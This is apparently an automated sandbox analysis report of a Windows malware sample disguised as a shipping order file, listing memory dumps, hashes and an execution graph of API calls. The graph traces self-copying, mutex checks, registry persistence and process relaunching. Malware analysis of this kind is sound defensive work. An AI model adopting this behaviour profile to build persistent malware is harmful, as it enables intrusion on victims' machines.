                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2058434698.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_72f0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4']q
                                                      • API String ID: 0-1259897404
                                                      • Opcode ID: 018375f16bdcc0b3d07a866a1697c901cdcc72885f6d30c477906f90755f6a80
                                                      • Instruction ID: 562daefb1a5d51e3efc7f56f67f25e7ff5772359cf93084065d3cbbc4063bb8a
                                                      • Opcode Fuzzy Hash: 018375f16bdcc0b3d07a866a1697c901cdcc72885f6d30c477906f90755f6a80
                                                      • Instruction Fuzzy Hash: 2A610971E152099FD708EF7AE98169ABBF6FF88300F54C929D0089B368FB745806CB40
                                                      Function 05280040 Relevance: .3, Instructions: 315COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d014dd206d38908e9b06f76ddd363cec3d5006a6288984128c2b54d80cd2fb7d
                                                      • Instruction ID: 91da6e0c3622a05f069e15b4486b9a01d32f30226ea96fbafa3d377598fdd5f7
                                                      • Opcode Fuzzy Hash: d014dd206d38908e9b06f76ddd363cec3d5006a6288984128c2b54d80cd2fb7d
                                                      • Instruction Fuzzy Hash: EF12C6F8D81B458BD310CF25EA4C38A3BF1BBA5398BD04B19D2611B2E5DBB4156ACF44
                                                      Function 02BBD63C Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2042562030.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2bb0000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6646c0ee4f9aa15a235f8940c31c98f23cc43668c1966b6d48ede4bd6a6302c4
                                                      • Instruction ID: 35e84473a8c7143b5a72b4fe91fa81109826936e261ba99704c9075b2fce5978
                                                      • Opcode Fuzzy Hash: 6646c0ee4f9aa15a235f8940c31c98f23cc43668c1966b6d48ede4bd6a6302c4
                                                      • Instruction Fuzzy Hash: 71A12B36E002058FCF06DFA5C8445EEB7B2FF85304B2585AAF805AB665DBB1E915CB80
                                                      Function 05280007 Relevance: .2, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2057255515.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5280000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 679de141e7018375fb156c8c67a0248fa294eb52d52bf34de1c9518a8997b5b3
                                                      • Instruction ID: e177072c0de27f2a65fc507c17b138d9846aa2c00a8a6b0b2c5603041f353430
                                                      • Opcode Fuzzy Hash: 679de141e7018375fb156c8c67a0248fa294eb52d52bf34de1c9518a8997b5b3
                                                      • Instruction Fuzzy Hash: DAC15DB9C80B458FD311CF64EA4838A3BF1BFA5398F904B19D1616B2E1DBB4156ACF44

                                                      Execution Graph

                                                      Execution Coverage:1.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:2.1%
                                                      Total number of Nodes:669
                                                      Total number of Limit Nodes:20
                                                      execution_graph 47191 43a998 47194 43a9a4 _swprintf BuildCatchObjectHelperInternal 47191->47194 47192 43a9b2 47207 445354 20 API calls __dosmaperr 47192->47207 47194->47192 47195 43a9dc 47194->47195 47202 444acc EnterCriticalSection 47195->47202 47197 43a9e7 47203 43aa88 47197->47203 47199 43a9b7 ___std_exception_copy __wsopen_s 47202->47197 47205 43aa96 47203->47205 47204 43a9f2 47208 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 47204->47208 47205->47204 47209 448416 36 API calls 2 library calls 47205->47209 47207->47199 47208->47199 47209->47205 47210 402bcc 47211 402bd7 47210->47211 47212 402bdf 47210->47212 47228 403315 28 API calls _Deallocate 47211->47228 47213 402beb 47212->47213 47218 4015d3 47212->47218 47216 402bdd 47220 43360d 47218->47220 47221 402be9 47220->47221 47223 43362e std::_Facet_Register 47220->47223 47229 43a88c 47220->47229 47236 442200 7 API calls 2 library calls 47220->47236 47224 433dec std::_Facet_Register 47223->47224 47237 437bd7 RaiseException 47223->47237 47238 437bd7 RaiseException 47224->47238 47226 433e09 47228->47216 47234 446aff _strftime 47229->47234 47230 446b3d 47240 445354 20 API calls __dosmaperr 47230->47240 47231 446b28 RtlAllocateHeap 47233 446b3b 47231->47233 47231->47234 47233->47220 47234->47230 47234->47231 47239 442200 7 API calls 2 library calls 47234->47239 47236->47220 47237->47224 47238->47226 47239->47234 47240->47233 47241 4339be 47242 4339ca BuildCatchObjectHelperInternal 47241->47242 47273 4336b3 47242->47273 47244 433b24 47564 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47244->47564 47246 4339d1 47246->47244 47248 4339fb 47246->47248 47247 433b2b 47565 4426be 28 API calls _abort 47247->47565 47259 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47248->47259 47558 4434d1 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47248->47558 47250 433b31 47566 442670 28 API calls _abort 47250->47566 47253 433a14 47255 433a1a 47253->47255 47559 443475 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47253->47559 47254 433b39 47257 433a9b 47284 433c5e 47257->47284 47259->47257 47560 43edf4 35 API calls 4 library calls 47259->47560 47267 433abd 47267->47247 47268 433ac1 47267->47268 47269 433aca 47268->47269 47562 442661 28 API calls _abort 47268->47562 47563 433842 13 API calls 2 library calls 47269->47563 47272 433ad2 47272->47255 47274 4336bc 47273->47274 47567 433e0a IsProcessorFeaturePresent 47274->47567 47276 4336c8 47568 4379ee 10 API calls 3 library calls 47276->47568 47278 4336cd 47283 4336d1 47278->47283 47569 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47278->47569 47280 4336da 47281 4336e8 47280->47281 47570 437a17 8 API calls 3 library calls 47280->47570 47281->47246 47283->47246 47571 436050 47284->47571 47286 433c71 GetStartupInfoW 47287 433aa1 47286->47287 47288 443422 47287->47288 47572 44ddc9 47288->47572 47290 433aaa 47293 40d767 47290->47293 47291 44342b 47291->47290 47576 44e0d3 35 API calls 47291->47576 47578 41bce3 LoadLibraryA GetProcAddress 47293->47578 47295 40d783 GetModuleFileNameW 47583 40e168 47295->47583 47297 40d79f 47598 401fbd 47297->47598 47300 401fbd 28 API calls 47301 40d7bd 47300->47301 47602 41afc3 47301->47602 47305 40d7cf 47627 401d8c 47305->47627 47307 40d7d8 47308 40d835 47307->47308 47309 40d7eb 47307->47309 47633 401d64 47308->47633 47820 40e986 111 API calls 47309->47820 47312 40d7fd 47314 401d64 22 API calls 47312->47314 47313 40d845 47315 401d64 22 API calls 47313->47315 47318 40d809 47314->47318 47316 40d864 47315->47316 47638 404cbf 47316->47638 47821 40e937 65 API calls 47318->47821 47319 40d873 47642 405ce6 47319->47642 47322 40d87f 47645 401eef 47322->47645 47323 40d824 47822 40e155 65 API calls 47323->47822 47326 40d88b 47649 401eea 47326->47649 47328 40d894 47330 401eea 11 API calls 47328->47330 47329 401eea 11 API calls 47331 40dc9f 47329->47331 47332 40d89d 47330->47332 47561 433c94 GetModuleHandleW 47331->47561 47333 401d64 22 API calls 47332->47333 47334 40d8a6 47333->47334 47653 401ebd 47334->47653 47336 40d8b1 47337 401d64 22 API calls 47336->47337 47338 40d8ca 47337->47338 47339 401d64 22 API calls 47338->47339 47341 40d8e5 47339->47341 47340 40d946 47342 401d64 22 API calls 47340->47342 47358 40e134 47340->47358 47341->47340 47823 4085b4 28 API calls 47341->47823 47347 40d95d 47342->47347 47344 40d912 47345 401eef 11 API calls 47344->47345 47346 40d91e 47345->47346 47348 401eea 11 API calls 47346->47348 47353 4124b7 3 API calls 47347->47353 47361 40d9a4 47347->47361 47349 40d927 47348->47349 47824 4124b7 RegOpenKeyExA 47349->47824 47351 40d9aa 47352 40d82d 47351->47352 47660 41a463 47351->47660 47352->47329 47355 40d988 47353->47355 47355->47361 47827 412902 30 API calls 47355->47827 47357 40d9c5 47360 40da18 47357->47360 47677 40697b 47357->47677 47858 412902 30 API calls 47358->47858 47362 401d64 22 API calls 47360->47362 47657 40bed7 47361->47657 47365 40da21 47362->47365 47374 40da32 47365->47374 47375 40da2d 47365->47375 47367 40e14a 47859 4112b5 64 API calls ___scrt_fastfail 47367->47859 47368 40d9e4 47828 40699d 30 API calls 47368->47828 47369 40d9ee 47373 401d64 22 API calls 47369->47373 47382 40d9f7 47373->47382 47379 401d64 22 API calls 47374->47379 47831 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47375->47831 47376 40d9e9 47829 4064d0 97 API calls 47376->47829 47380 40da3b 47379->47380 47681 41ae08 47380->47681 47382->47360 47384 40da13 47382->47384 47383 40da46 47685 401e18 47383->47685 47830 4064d0 97 API calls 47384->47830 47387 40da51 47689 401e13 47387->47689 47389 40da5a 47390 401d64 22 API calls 47389->47390 47391 40da63 47390->47391 47392 401d64 22 API calls 47391->47392 47393 40da7d 47392->47393 47394 401d64 22 API calls 47393->47394 47395 40da97 47394->47395 47396 401d64 22 API calls 47395->47396 47398 40dab0 47396->47398 47397 40db1d 47400 40db2c 47397->47400 47404 40dcaa ___scrt_fastfail 47397->47404 47398->47397 47399 401d64 22 API calls 47398->47399 47403 40dac5 _wcslen 47399->47403 47401 401d64 22 API calls 47400->47401 47407 40dbb1 47400->47407 47402 40db3e 47401->47402 47405 401d64 22 API calls 47402->47405 47403->47397 47408 401d64 22 API calls 47403->47408 47834 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47404->47834 47406 40db50 47405->47406 47411 401d64 22 API calls 47406->47411 47429 40dbac ___scrt_fastfail 47407->47429 47409 40dae0 47408->47409 47413 401d64 22 API calls 47409->47413 47412 40db62 47411->47412 47416 401d64 22 API calls 47412->47416 47414 40daf5 47413->47414 47693 40c89e 47414->47693 47415 40dcef 47417 401d64 22 API calls 47415->47417 47419 40db8b 47416->47419 47420 40dd16 47417->47420 47424 401d64 22 API calls 47419->47424 47835 401f66 47420->47835 47422 401e18 11 API calls 47423 40db14 47422->47423 47427 401e13 11 API calls 47423->47427 47428 40db9c 47424->47428 47426 40dd25 47839 4126d2 14 API calls 47426->47839 47427->47397 47750 40bc67 47428->47750 47429->47407 47832 4128a2 31 API calls 47429->47832 47433 40dd3b 47435 401d64 22 API calls 47433->47435 47434 40dc45 ctype 47437 401d64 22 API calls 47434->47437 47436 40dd47 47435->47436 47840 43a5e7 39 API calls _strftime 47436->47840 47440 40dc5c 47437->47440 47439 40dd54 47441 40dd81 47439->47441 47841 41beb0 86 API calls ___scrt_fastfail 47439->47841 47440->47415 47442 401d64 22 API calls 47440->47442 47445 401f66 28 API calls 47441->47445 47443 40dc7e 47442->47443 47446 41ae08 28 API calls 47443->47446 47448 40dd96 47445->47448 47449 40dc87 47446->47449 47447 40dd65 CreateThread 47447->47441 48020 41c96f 10 API calls 47447->48020 47450 401f66 28 API calls 47448->47450 47833 40e219 109 API calls __common_dcos_data 47449->47833 47452 40dda5 47450->47452 47842 41a686 79 API calls 47452->47842 47453 40dc8c 47453->47415 47455 40dc93 47453->47455 47455->47352 47456 40ddaa 47457 401d64 22 API calls 47456->47457 47458 40ddb6 47457->47458 47459 401d64 22 API calls 47458->47459 47460 40ddcb 47459->47460 47461 401d64 22 API calls 47460->47461 47462 40ddeb 47461->47462 47843 43a5e7 39 API calls _strftime 47462->47843 47464 40ddf8 47465 401d64 22 API calls 47464->47465 47466 40de03 47465->47466 47467 401d64 22 API calls 47466->47467 47468 40de14 47467->47468 47469 401d64 22 API calls 47468->47469 47470 40de29 47469->47470 47471 401d64 22 API calls 47470->47471 47472 40de3a 47471->47472 47473 40de41 StrToIntA 47472->47473 47844 409517 142 API calls _wcslen 47473->47844 47475 40de53 47476 401d64 22 API calls 47475->47476 47478 40de5c 47476->47478 47477 40dea1 47480 401d64 22 API calls 47477->47480 47478->47477 47845 43360d 22 API calls 3 library calls 47478->47845 47486 40deb1 47480->47486 47481 40de71 47482 401d64 22 API calls 47481->47482 47483 40de84 47482->47483 47484 40de8b CreateThread 47483->47484 47484->47477 48021 419128 102 API calls 3 library calls 47484->48021 47485 40def9 47487 401d64 22 API calls 47485->47487 47486->47485 47846 43360d 22 API calls 3 library calls 47486->47846 47493 40df02 47487->47493 47489 40dec6 47490 401d64 22 API calls 47489->47490 47491 40ded8 47490->47491 47494 40dedf CreateThread 47491->47494 47492 40df6c 47495 401d64 22 API calls 47492->47495 47493->47492 47496 401d64 22 API calls 47493->47496 47494->47485 48019 419128 102 API calls 3 library calls 47494->48019 47498 40df75 47495->47498 47497 40df1e 47496->47497 47500 401d64 22 API calls 47497->47500 47499 40dfba 47498->47499 47502 401d64 22 API calls 47498->47502 47850 41a7a2 29 API calls 47499->47850 47503 40df33 47500->47503 47505 40df8a 47502->47505 47847 40c854 31 API calls 47503->47847 47504 40dfc3 47506 401e18 11 API calls 47504->47506 47511 401d64 22 API calls 47505->47511 47507 40dfce 47506->47507 47510 401e13 11 API calls 47507->47510 47509 40df46 47513 401e18 11 API calls 47509->47513 47514 40dfd7 CreateThread 47510->47514 47512 40df9f 47511->47512 47848 43a5e7 39 API calls _strftime 47512->47848 47515 40df52 47513->47515 47517 40e004 47514->47517 47518 40dff8 CreateThread 47514->47518 48022 40e54f 82 API calls 47514->48022 47519 401e13 11 API calls 47515->47519 47520 40e019 47517->47520 47521 40e00d CreateThread 47517->47521 47518->47517 48023 410f36 138 API calls __common_dcos_data 47518->48023 47523 40df5b CreateThread 47519->47523 47525 40e073 47520->47525 47527 401f66 28 API calls 47520->47527 47521->47520 48017 411524 38 API calls ___scrt_fastfail 47521->48017 47523->47492 48018 40196b 49 API calls _strftime 47523->48018 47524 40dfac 47849 40b95c 7 API calls 47524->47849 47853 41246e RegOpenKeyExA RegQueryValueExA RegCloseKey 47525->47853 47528 40e046 47527->47528 47851 404c9e 28 API calls 47528->47851 47531 40e08b 47533 40e12a 47531->47533 47536 41ae08 28 API calls 47531->47536 47532 40e053 47534 401f66 28 API calls 47532->47534 47856 40cbac 27 API calls 47533->47856 47537 40e062 47534->47537 47539 40e0a4 47536->47539 47852 41a686 79 API calls 47537->47852 47538 40e12f 47857 413fd4 168 API calls _strftime 47538->47857 47854 412584 31 API calls 47539->47854 47542 40e067 47543 401eea 11 API calls 47542->47543 47543->47525 47545 40e0ba 47546 401e13 11 API calls 47545->47546 47549 40e0c5 47546->47549 47547 40e0ed DeleteFileW 47548 40e0f4 47547->47548 47547->47549 47551 41ae08 28 API calls 47548->47551 47549->47547 47549->47548 47550 40e0db Sleep 47549->47550 47550->47549 47552 40e104 47551->47552 47855 41297a RegOpenKeyExW RegDeleteValueW 47552->47855 47554 40e117 47555 401e13 11 API calls 47554->47555 47556 40e121 47555->47556 47557 401e13 11 API calls 47556->47557 47557->47533 47558->47253 47559->47259 47560->47257 47561->47267 47562->47269 47563->47272 47564->47247 47565->47250 47566->47254 47567->47276 47568->47278 47569->47280 47570->47283 47571->47286 47573 44dddb 47572->47573 47574 44ddd2 47572->47574 47573->47291 47577 44dcc8 48 API calls 5 library calls 47574->47577 47576->47291 47577->47573 47579 41bd22 LoadLibraryA GetProcAddress 47578->47579 47580 41bd12 GetModuleHandleA GetProcAddress 47578->47580 47581 41bd4b 32 API calls 47579->47581 47582 41bd3b LoadLibraryA GetProcAddress 47579->47582 47580->47579 47581->47295 47582->47581 47860 41a63f FindResourceA 47583->47860 47586 43a88c ___crtLCMapStringA 21 API calls 47587 40e192 ctype 47586->47587 47863 401f86 47587->47863 47590 401eef 11 API calls 47591 40e1b8 47590->47591 47592 401eea 11 API calls 47591->47592 47593 40e1c1 47592->47593 47594 43a88c ___crtLCMapStringA 21 API calls 47593->47594 47595 40e1d2 ctype 47594->47595 47867 406052 47595->47867 47597 40e205 47597->47297 47599 401fcc __common_dcos_data 47598->47599 47875 402501 47599->47875 47601 401fea 47601->47300 47622 41afd6 47602->47622 47603 41b046 47604 401eea 11 API calls 47603->47604 47605 41b078 47604->47605 47606 401eea 11 API calls 47605->47606 47608 41b080 47606->47608 47607 41b048 47882 403b60 28 API calls 47607->47882 47611 401eea 11 API calls 47608->47611 47614 40d7c6 47611->47614 47612 41b054 47615 401eef 11 API calls 47612->47615 47613 401eef 11 API calls 47613->47622 47623 40e8bd 47614->47623 47616 41b05d 47615->47616 47617 401eea 11 API calls 47616->47617 47619 41b065 47617->47619 47618 401eea 11 API calls 47618->47622 47883 41bfa9 28 API calls 47619->47883 47622->47603 47622->47607 47622->47613 47622->47618 47880 403b60 28 API calls 47622->47880 47881 41bfa9 28 API calls 47622->47881 47624 40e8ca 47623->47624 47626 40e8da 47624->47626 47884 40200a 11 API calls 47624->47884 47626->47305 47628 40200a 47627->47628 47632 40203a 47628->47632 47885 402654 11 API calls 47628->47885 47630 40202b 47886 4026ba 11 API calls _Deallocate 47630->47886 47632->47307 47634 401d6c 47633->47634 47635 401d74 47634->47635 47887 401fff 22 API calls 47634->47887 47635->47313 47639 404ccb 47638->47639 47888 402e78 47639->47888 47641 404cee 47641->47319 47897 404bc4 47642->47897 47644 405cf4 47644->47322 47646 401efe 47645->47646 47648 401f0a 47646->47648 47906 4021b9 11 API calls __common_dcos_data 47646->47906 47648->47326 47650 4021b9 __common_dcos_data 47649->47650 47651 4021e8 47650->47651 47907 40262e 11 API calls _Deallocate 47650->47907 47651->47328 47655 401ec9 __common_dcos_data 47653->47655 47654 401ee4 47654->47336 47655->47654 47656 402325 28 API calls 47655->47656 47656->47654 47908 401e8f 47657->47908 47659 40bee1 CreateMutexA GetLastError 47659->47351 47910 41b15b 47660->47910 47665 401eef 11 API calls 47666 41a49f 47665->47666 47667 401eea 11 API calls 47666->47667 47668 41a4a7 47667->47668 47669 41a4fa 47668->47669 47670 412513 31 API calls 47668->47670 47669->47357 47671 41a4cd 47670->47671 47672 41a4d8 StrToIntA 47671->47672 47673 41a4ef 47672->47673 47674 41a4e6 47672->47674 47676 401eea 11 API calls 47673->47676 47918 41c102 22 API calls __common_dcos_data 47674->47918 47676->47669 47678 40698f 47677->47678 47679 4124b7 3 API calls 47678->47679 47680 406996 47679->47680 47680->47368 47680->47369 47682 41ae1c 47681->47682 47919 40b027 47682->47919 47684 41ae24 47684->47383 47686 401e27 47685->47686 47688 401e33 47686->47688 47928 402121 11 API calls __common_dcos_data 47686->47928 47688->47387 47691 402121 __common_dcos_data 47689->47691 47690 402150 __common_dcos_data 47690->47389 47691->47690 47929 402718 11 API calls _Deallocate 47691->47929 47694 40c8ba __common_dcos_data 47693->47694 47695 40c8da 47694->47695 47696 40c90f 47694->47696 47697 40c8d0 47694->47697 47934 41a74b 29 API calls 47695->47934 47700 41b15b GetCurrentProcess 47696->47700 47699 40ca03 GetLongPathNameW 47697->47699 47930 403b40 47699->47930 47701 40c914 47700->47701 47704 40c918 47701->47704 47705 40c96a 47701->47705 47702 40c8e3 47706 401e18 11 API calls 47702->47706 47709 403b40 28 API calls 47704->47709 47708 403b40 28 API calls 47705->47708 47745 40c8ed 47706->47745 47712 40c978 47708->47712 47713 40c926 47709->47713 47710 403b40 28 API calls 47711 40ca27 47710->47711 47937 40cc37 28 API calls __common_dcos_data 47711->47937 47718 403b40 28 API calls 47712->47718 47719 403b40 28 API calls 47713->47719 47715 401e13 11 API calls 47715->47697 47716 40ca3a 47938 402860 28 API calls 47716->47938 47721 40c98e 47718->47721 47722 40c93c 47719->47722 47720 40ca45 47939 402860 28 API calls 47720->47939 47936 402860 28 API calls 47721->47936 47935 402860 28 API calls 47722->47935 47726 40ca4f 47729 401e13 11 API calls 47726->47729 47727 40c999 47730 401e18 11 API calls 47727->47730 47728 40c947 47731 401e18 11 API calls 47728->47731 47732 40ca59 47729->47732 47733 40c9a4 47730->47733 47734 40c952 47731->47734 47735 401e13 11 API calls 47732->47735 47736 401e13 11 API calls 47733->47736 47737 401e13 11 API calls 47734->47737 47738 40ca62 47735->47738 47739 40c9ad 47736->47739 47740 40c95b 47737->47740 47741 401e13 11 API calls 47738->47741 47742 401e13 11 API calls 47739->47742 47743 401e13 11 API calls 47740->47743 47744 40ca6b 47741->47744 47742->47745 47743->47745 47746 401e13 11 API calls 47744->47746 47745->47715 47747 40ca74 47746->47747 47748 401e13 11 API calls 47747->47748 47749 40ca7d 47748->47749 47749->47422 47751 40bc7a _wcslen 47750->47751 47752 40bc84 47751->47752 47753 40bcce 47751->47753 47756 40bc8d CreateDirectoryW 47752->47756 47754 40c89e 31 API calls 47753->47754 47755 40bce0 47754->47755 47757 401e18 11 API calls 47755->47757 47941 40856b 47756->47941 47759 40bccc 47757->47759 47761 401e13 11 API calls 47759->47761 47760 40bca9 47975 4028cf 47760->47975 47767 40bcf7 47761->47767 47763 40bcb5 47764 401e18 11 API calls 47763->47764 47765 40bcc3 47764->47765 47766 401e13 11 API calls 47765->47766 47766->47759 47768 40bd10 47767->47768 47769 40bd2d 47767->47769 47771 40bb7b 31 API calls 47768->47771 47770 40bd36 CopyFileW 47769->47770 47772 40be07 47770->47772 47773 40bd48 _wcslen 47770->47773 47805 40bd21 47771->47805 47947 40bb7b 47772->47947 47773->47772 47775 40bd64 47773->47775 47776 40bdb7 47773->47776 47779 40c89e 31 API calls 47775->47779 47778 40c89e 31 API calls 47776->47778 47783 40bdbd 47778->47783 47784 40bd6a 47779->47784 47780 40be21 47785 40be2a SetFileAttributesW 47780->47785 47781 40be4d 47782 40be95 CloseHandle 47781->47782 47787 403b40 28 API calls 47781->47787 47973 401e07 47782->47973 47788 401e18 11 API calls 47783->47788 47789 401e18 11 API calls 47784->47789 47804 40be39 _wcslen 47785->47804 47791 40be63 47787->47791 47792 40bdb1 47788->47792 47793 40bd76 47789->47793 47790 40beb1 ShellExecuteW 47795 40bec4 47790->47795 47796 40bece ExitProcess 47790->47796 47797 41ae08 28 API calls 47791->47797 47798 401e13 11 API calls 47792->47798 47794 401e13 11 API calls 47793->47794 47799 40bd7f 47794->47799 47800 40bed7 CreateMutexA GetLastError 47795->47800 47801 40be76 47797->47801 47802 40bdcf 47798->47802 47803 40856b 28 API calls 47799->47803 47800->47805 47978 412774 RegCreateKeyW 47801->47978 47808 40bddb CreateDirectoryW 47802->47808 47806 40bd93 47803->47806 47804->47781 47807 40be4a SetFileAttributesW 47804->47807 47805->47429 47809 4028cf 28 API calls 47806->47809 47807->47781 47811 401e07 47808->47811 47812 40bd9f 47809->47812 47815 40bdeb CopyFileW 47811->47815 47816 401e18 11 API calls 47812->47816 47814 401e13 11 API calls 47814->47782 47815->47772 47817 40bdf8 47815->47817 47818 40bda8 47816->47818 47817->47805 47819 401e13 11 API calls 47818->47819 47819->47792 47820->47312 47821->47323 47823->47344 47825 4124e1 RegQueryValueExA RegCloseKey 47824->47825 47826 41250b 47824->47826 47825->47826 47826->47340 47827->47361 47828->47376 47829->47369 47830->47360 47831->47374 47832->47434 47833->47453 47834->47415 47836 401f6e __common_dcos_data 47835->47836 48012 402301 47836->48012 47839->47433 47840->47439 47841->47447 47842->47456 47843->47464 47844->47475 47845->47481 47846->47489 47847->47509 47848->47524 47849->47499 47850->47504 47851->47532 47852->47542 47853->47531 47854->47545 47855->47554 47856->47538 48016 419e89 104 API calls 47857->48016 47858->47367 47861 40e183 47860->47861 47862 41a65c LoadResource LockResource SizeofResource 47860->47862 47861->47586 47862->47861 47864 401f8e __common_dcos_data 47863->47864 47870 402325 47864->47870 47866 401fa4 47866->47590 47868 401f86 28 API calls 47867->47868 47869 406066 47868->47869 47869->47597 47871 40232f __common_dcos_data 47870->47871 47873 40233a 47871->47873 47874 40294a 28 API calls __common_dcos_data 47871->47874 47873->47866 47874->47873 47876 40250d __common_dcos_data 47875->47876 47877 40252b 47876->47877 47879 40261a 28 API calls 47876->47879 47877->47601 47879->47877 47880->47622 47881->47622 47882->47612 47883->47603 47884->47626 47885->47630 47886->47632 47889 402e85 __common_dcos_data 47888->47889 47890 402e98 47889->47890 47892 402ea9 47889->47892 47893 402eae 47889->47893 47895 403445 28 API calls __common_dcos_data 47890->47895 47892->47641 47893->47892 47896 40225b 11 API calls __common_dcos_data 47893->47896 47895->47892 47896->47892 47898 404bd0 47897->47898 47901 40245c 47898->47901 47900 404be4 47900->47644 47902 402469 __common_dcos_data 47901->47902 47904 402478 47902->47904 47905 402ad3 28 API calls __common_dcos_data 47902->47905 47904->47900 47905->47904 47906->47648 47907->47651 47909 401e94 __common_dcos_data 47908->47909 47911 41a471 47910->47911 47912 41b168 GetCurrentProcess 47910->47912 47913 412513 RegOpenKeyExA 47911->47913 47912->47911 47914 412541 RegQueryValueExA RegCloseKey 47913->47914 47915 412569 47913->47915 47914->47915 47916 401f66 28 API calls 47915->47916 47917 41257e 47916->47917 47917->47665 47918->47673 47920 40b02f __common_dcos_data 47919->47920 47923 40b04b 47920->47923 47922 40b045 47922->47684 47924 40b055 __common_dcos_data 47923->47924 47926 40b060 __common_dcos_data 47924->47926 47927 40b138 28 API calls __common_dcos_data 47924->47927 47926->47922 47927->47926 47928->47688 47929->47690 47931 403b48 __common_dcos_data 47930->47931 47940 403b7a 28 API calls 47931->47940 47933 403b5a 47933->47710 47934->47702 47935->47728 47936->47727 47937->47716 47938->47720 47939->47726 47940->47933 47942 408577 __common_dcos_data 47941->47942 47984 402ca8 47942->47984 47946 4085a3 47946->47760 47948 40bba1 47947->47948 47949 40bbdd 47947->47949 48002 40b0dd 47948->48002 47951 40bc1e 47949->47951 47954 40b0dd 28 API calls 47949->47954 47953 40bc5f 47951->47953 47956 40b0dd 28 API calls 47951->47956 47953->47780 47953->47781 47957 40bbf4 47954->47957 47955 4028cf 28 API calls 47958 40bbbd 47955->47958 47959 40bc35 47956->47959 47960 4028cf 28 API calls 47957->47960 47962 412774 14 API calls 47958->47962 47963 4028cf 28 API calls 47959->47963 47961 40bbfe 47960->47961 47964 412774 14 API calls 47961->47964 47965 40bbd1 47962->47965 47966 40bc3f 47963->47966 47967 40bc12 47964->47967 47968 401e13 11 API calls 47965->47968 47969 412774 14 API calls 47966->47969 47970 401e13 11 API calls 47967->47970 47968->47949 47971 40bc53 47969->47971 47970->47951 47972 401e13 11 API calls 47971->47972 47972->47953 47974 401e0c __common_dcos_data 47973->47974 48008 402d8b 47975->48008 47977 4028dd 47977->47763 47979 4127c6 47978->47979 47981 412789 47978->47981 47980 401e13 11 API calls 47979->47980 47982 40be89 47980->47982 47983 4127a2 RegSetValueExW RegCloseKey 47981->47983 47982->47814 47983->47979 47985 402cb5 __common_dcos_data 47984->47985 47986 402cc8 47985->47986 47988 402cd9 47985->47988 47989 402cde 47985->47989 47995 403374 28 API calls __common_dcos_data 47986->47995 47991 402de3 47988->47991 47989->47988 47996 402f21 11 API calls __common_dcos_data 47989->47996 47992 402daf __common_dcos_data 47991->47992 47997 4030f7 47992->47997 47994 402dcd 47994->47946 47995->47988 47996->47988 47998 403101 __common_dcos_data 47997->47998 48000 403115 __common_dcos_data 47998->48000 48001 4036c2 28 API calls __common_dcos_data 47998->48001 48000->47994 48001->48000 48003 40b0e9 __common_dcos_data 48002->48003 48004 402ca8 28 API calls 48003->48004 48005 40b10c 48004->48005 48006 402de3 28 API calls 48005->48006 48007 40b11f 48006->48007 48007->47955 48009 402d97 48008->48009 48010 4030f7 28 API calls 48009->48010 48011 402dab 48010->48011 48011->47977 48013 40230d 48012->48013 48014 402325 28 API calls 48013->48014 48015 401f80 48014->48015 48015->47426 48024 411637 62 API calls 48023->48024

                                                      Executed Functions

                                                      Function 0041BCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                      • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                      • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                      • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                      • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
